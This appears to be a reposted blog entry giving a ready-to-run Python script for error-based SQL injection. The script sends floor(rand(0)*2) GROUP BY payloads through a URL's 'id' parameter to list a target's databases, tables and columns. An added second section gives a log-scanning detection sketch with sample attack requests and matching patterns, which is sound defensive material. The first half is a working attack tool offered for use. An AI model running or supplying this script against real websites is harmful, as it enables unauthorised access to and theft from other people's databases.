Python Code for Error-Based Injection
Source: Internet  Editor: 程序博客网  Time: 2024/04/29 04:14
Python code for error-based SQL injection that can enumerate databases, tables, and columns
```python
import re
import sys
import binascii

import requests


def Get_db(url):
    # Count the distinct schemas. The value comes back between ":::" (0x3a3a3a)
    # markers inside the duplicate-key error raised by floor(rand(0)*2) with GROUP BY.
    url_dbs_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct table_schema) from information_schema.COLUMNS),0x3a3a3a)a from information_schema.tables group by a)b --+"
    resp = requests.get(url_dbs_num)
    html = resp.text
    db_num = int(re.search(r':::(\d+):::', html).group(1))
    print("Database number : %d" % db_num)
    # Read the schema names one at a time with LIMIT n,1.
    for n in range(0, db_num):
        url_dbs_table = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct table_schema from information_schema.COLUMNS limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % n
        resp = requests.get(url_dbs_table)
        html = resp.text
        db_name = re.search(r':::(.*?):::', html).group(1)
        print(db_name)


def Get_table(url, db_name):
    # Pass the schema name as a hex literal so the payload needs no quotes.
    db_name = "0x" + binascii.b2a_hex(db_name.encode()).decode()
    url_tables_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct table_name) from information_schema.COLUMNS where table_schema=%s),0x3a3a3a)a from information_schema.tables group by a)b --+" % db_name
    resp = requests.get(url_tables_num)
    html = resp.text
    tables_num = int(re.search(r':::(\d+):::', html).group(1))
    print("tables number : %d" % tables_num)
    for n in range(0, tables_num):
        url_tablename = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct table_name from information_schema.COLUMNS where table_schema=%s limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name, n)
        resp = requests.get(url_tablename)
        html = resp.text
        table_name = re.search(r":::(.*?):::", html).group(1)
        print(table_name)


def Get_column(url, db_name, table_name):
    db_name = "0x" + binascii.b2a_hex(db_name.encode()).decode()
    table_name = "0x" + binascii.b2a_hex(table_name.encode()).decode()
    url_columns_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct column_name) from information_schema.COLUMNS where table_schema=%s and table_name=%s),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name, table_name)
    resp = requests.get(url_columns_num)
    html = resp.text
    columns_num = int(re.search(r":::(\d+):::", html).group(1))
    print("Columns number : %d" % columns_num)
    for n in range(0, columns_num):
        url_columns_name = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct column_name from information_schema.COLUMNS where table_schema=%s and table_name=%s limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name, table_name, n)
        resp = requests.get(url_columns_name)
        html = resp.text
        column_name = re.search(r":::(.*?):::", html).group(1)
        print(column_name)


def main():
    # Arguments: <url> --dbs | <url> -D <db> --tables | <url> -D <db> -T <table> --columns
    args = sys.argv[1:]
    if len(args) == 2 and args[1] == '--dbs':
        Get_db(args[0])
    elif len(args) == 4 and args[1] == '-D' and args[3] == '--tables':
        Get_table(args[0], args[2])
    elif len(args) == 6 and args[1] == '-D' and args[3] == '-T' and args[5] == '--columns':
        Get_column(args[0], args[2], args[4])
    else:
        print("Usage: %s <url> --dbs | -D <db> --tables | -D <db> -T <table> --columns" % sys.argv[0])


if __name__ == '__main__':
    main()
```
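The requests this script sends have a distinctive shape in web server logs. The following detection sketch is an added example, not part of the original post: it URL-decodes each logged query string, flags the `floor(rand(...))` plus `group by` combination, and decodes the hex literals to show which schema or table was probed. The log format, IP addresses, paths and schema names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed log lines (documentation IPs, made-up paths and schema names).
_HEAD = "%27%20union%20select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a3a3a,"
_TAIL = ",0x3a3a3a)a%20from%20information_schema.tables%20group%20by%20a)b%20--+"
_COLS = "%20from%20information_schema.COLUMNS%20where%20table_schema=0x73686f70"
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Apr/2024:04:14:01 +0000] "GET /item.php?id=42 HTTP/1.1" 200 512',
    '198.51.100.7 - - [29/Apr/2024:04:14:02 +0000] "GET /search.php?q=sql+group+by HTTP/1.1" 200 900',
    '198.51.100.9 - - [29/Apr/2024:04:14:05 +0000] "GET /item.php?id=' + _HEAD
    + "(select%20count(distinct%20table_name)" + _COLS + ")" + _TAIL + ' HTTP/1.1" 200 730',
    '198.51.100.9 - - [29/Apr/2024:04:14:06 +0000] "GET /item.php?id=' + _HEAD
    + "(select%20distinct%20column_name" + _COLS
    + "%20and%20table_name=0x7573657273%20limit%200,1)" + _TAIL + ' HTTP/1.1" 200 741',
]
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Any single signal is weak; floor(rand()) together with GROUP BY is the tell.
SIGNALS = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)", re.I),
    "info_schema": re.compile(r"information_schema\.", re.I),
}
STAGE_RE = re.compile(r"distinct\s+(table_schema|table_name|column_name)", re.I)
HEX_RE = re.compile(r"=\s*0x((?:[0-9a-f]{2})+)", re.I)

def inspect(line):
    """Return a finding dict for one log line, or None if it does not match."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    query = unquote_plus(urlsplit(target).query)
    hits = [name for name, rx in SIGNALS.items() if rx.search(query)]
    if "floor_rand" not in hits or "group_by" not in hits:
        return None
    stage = STAGE_RE.search(query)
    # Hex literals replace quoted names; decoding shows which schema/table was probed.
    targets = [bytes.fromhex(h).decode("utf-8", "replace") for h in HEX_RE.findall(query)]
    return {"client": client, "signals": hits,
            "stage": stage.group(1).lower() if stage else None, "targets": targets}

def scan(lines):
    return [f for f in map(inspect, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The `stage` field shows how far the enumeration has progressed (`table_schema`, `table_name`, then `column_name`), which helps prioritise a response.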